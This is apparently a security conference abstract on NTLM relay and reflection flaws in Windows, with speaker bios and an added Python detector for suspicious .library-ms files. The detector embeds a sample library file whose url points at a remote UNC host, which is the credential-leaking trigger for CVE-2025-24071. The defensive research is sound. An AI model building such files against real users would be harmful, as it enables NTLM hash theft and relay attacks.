NTLM Exploit Redux!
Amid endemic cyber warfare, 2025 has seen a resurgence of credential relay attacks against Windows environments, used to infiltrate government, corporate and personal infrastructure. CISA has reported that the NTLM relay technique is being actively exploited by APT groups such as Fancy Bear (aka APT28), Cozy Bear (aka APT29), Blind Eagle (aka APT-C-36) and UAC-0194.
In March 2025 Microsoft patched two closely linked vulnerabilities: CVE-2025-24054, an NTLM hash disclosure spoofing vulnerability, and CVE-2025-24071, a Windows File Explorer spoofing vulnerability. Minimal user interaction, such as clicking on a file or extracting an archive, is enough to trigger them and send the victim's NTLM authentication responses (Net-NTLMv2 challenge-responses, loosely called NTLM hashes) over the network into hostile hands, where they can be relayed to another service or cracked offline. The root cause is the way Windows handles the URL value inside library description files (extension .library-ms): when that value is a UNC path, Explorer issues an SMB request to it, and with it an NTLM authentication, as soon as it parses the file, for example when the file is extracted from an archive or the folder containing it is viewed. In-the-wild exploitation of CVE-2025-24054 was attributed to Fancy Bear, targeting government entities in Poland and Romania, and working exploit code has reportedly been offered for sale on the dark web.
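To make the .library-ms trigger concrete, here is an added example, not code from the presentation or from K7 Labs, that parses a library description file and flags any url entry pointing at a remote host, which is the condition under which Explorer will initiate an SMB connection and NTLM authentication. The sample file body is constructed for the example, the host 203.0.113.10 is a documentation address, and the helper names and the remote-path regex are the example's own assumptions.

```python
import re
import xml.etree.ElementTree as ET
from typing import List

# Namespace used by Windows library description (.library-ms) files.
LIBRARY_NS = "http://schemas.microsoft.com/windows/2009/library"

# Constructed sample: a library whose first simpleLocation points at a remote
# host (a UNC path), which Explorer will contact over SMB when it parses the file.
SAMPLE_LIBRARY_MS = r"""<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>\\203.0.113.10\share</url>
      </simpleLocation>
    </searchConnectorDescription>
    <searchConnectorDescription>
      <simpleLocation>
        <url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

# Forms of a location that name a remote host: UNC (\\host\share), the
# forward-slash UNC variant (//host/share), file://host/share and smb://.
# file:///C:/... has an empty host and is therefore local.
REMOTE_URL = re.compile(r"^(\\\\[^\\]+\\|//[^/]+/|file://[^/]+/|smb://)", re.IGNORECASE)


def is_remote_location(url: str) -> bool:
    """True if the url would make Explorer reach out to another host."""
    u = url.strip()
    # \\?\ and \\.\ are local device-path prefixes, not remote hosts.
    if u.startswith(("\\\\?\\", "\\\\.\\")):
        return False
    return bool(REMOTE_URL.match(u))


def find_remote_locations(library_xml: bytes) -> List[str]:
    """Return every <url> value in a .library-ms body that points at a remote host.

    Raises xml.etree.ElementTree.ParseError on malformed input, so a caller
    scanning untrusted files should treat that as suspicious rather than benign.
    """
    root = ET.fromstring(library_xml)
    hits: List[str] = []
    for el in root.iter():
        # Match the local name so files with or without the namespace are handled.
        local_name = el.tag.rsplit("}", 1)[-1]
        if local_name == "url" and el.text and is_remote_location(el.text):
            hits.append(el.text.strip())
    return hits


if __name__ == "__main__":
    for location in find_remote_locations(SAMPLE_LIBRARY_MS.encode("utf-8")):
        print(f"remote location in library file: {location}")
```

Run over extracted archive contents or a mail attachment quarantine, the same function gives a cheap pre-filter: any .library-ms whose url names a host the organisation does not own is a credential-leak attempt regardless of whether the patch is applied, because the file does nothing else.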
CVE-2025-33073, a Windows SMB client elevation of privilege (EoP) vulnerability patched in June 2025, is an NTLM reflection attack: the victim machine is coerced into performing an NTLM authentication over SMB that is reflected back to itself, giving the attacker SYSTEM-level access. It works because the checks meant to block local (reflected) NTLM authentication are bypassed when the target of the request is a DNS record whose name carries a marshalled string, i.e. a server name with an appended magic blob that encodes the target information normally used for Kerberos authentication. Although a proof-of-concept exploit was public as soon as the patch shipped, there were no reports of in-the-wild exploitation at the time of writing this abstract.
Our previous research on NTLM disclosure vulnerabilities, such as CVE-2021-36942 in the Windows Local Security Authority (LSA) and CVE-2023-23397 in Outlook, both exploited in the wild, gives us key insights into today's exploitation mechanisms. Credential relay attacks are clearly far from over, and understanding the low-level mechanics behind them is what makes them defensible.
In this presentation we will detail the root causes behind these relay attacks through the exploitation of CVE-2025-24071 and CVE-2025-33073, with live demos of both. We will also walk through the patch diffs that show how Microsoft closed each vulnerability. Finally, we will highlight best practices for defending against these attacks.

Anurag Shandilya – K7 Computing Pvt Ltd
Anurag Shandilya is the Vulnerability Research Manager at K7 Labs. His areas of research include Windows and IoT vulnerabilities. He has 9+ years of experience in Vulnerability Research and Vulnerability Assessment & Penetration Testing (VAPT). He has presented at AVAR (2018, 2020, 2021 and 2022), VB (2019, 2023) and CARO (2020) and actively contributes to the K7 Labs blog.

Arnab Mandal – K7 Computing Pvt Ltd
Arnab Mandal is a Vulnerability Researcher at K7 Labs specializing in Windows exploitation techniques. His analyses of various Windows vulnerabilities are published on the K7 Labs technical blog. He also specializes in identifying and mitigating vulnerabilities across web and mobile applications, network infrastructure and APIs.

Satyam Yadav – K7 Computing Pvt Ltd
Satyam Yadav is a Vulnerability Researcher at K7 Computing, specializing in n-day vulnerability analysis on Windows. He also brings expertise in identifying and mitigating security risks across web applications, network infrastructure and APIs. He writes technical blogs for the K7 Labs technical blog and authors IDS detection signatures for K7 products.
